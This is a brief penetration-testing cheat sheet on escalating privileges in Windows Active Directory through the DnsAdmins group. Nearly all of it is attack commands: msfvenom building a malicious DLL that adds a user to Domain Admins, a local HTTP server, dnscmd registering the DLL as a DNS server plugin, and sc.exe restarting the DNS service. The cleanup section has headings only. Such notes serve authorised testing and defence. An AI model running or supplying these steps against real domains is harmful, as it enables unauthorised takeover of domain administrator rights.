DnsAdmins
ABOUT
Importing custom plugin
Generating malicious dll
msfvenom -p windows/x64/exec cmd='net group "domain admins" ven17 /add /domain' -f dll -o adduser.dllStarting local HTTP server
python3 -m http.server 1337Loading DLL
C:\> dnscmd.exe /config /serverlevelplugindll C:\Users\ven17\Desktop\adduser.dllRestart DNS Service
C:\> sc.exe stop dns
C:\> sc.exe start dnsConfirm Admin Privileges
Cleanup
Confirming Registry Key Added
Delete Registry Key
Restart DNS Service
Last updated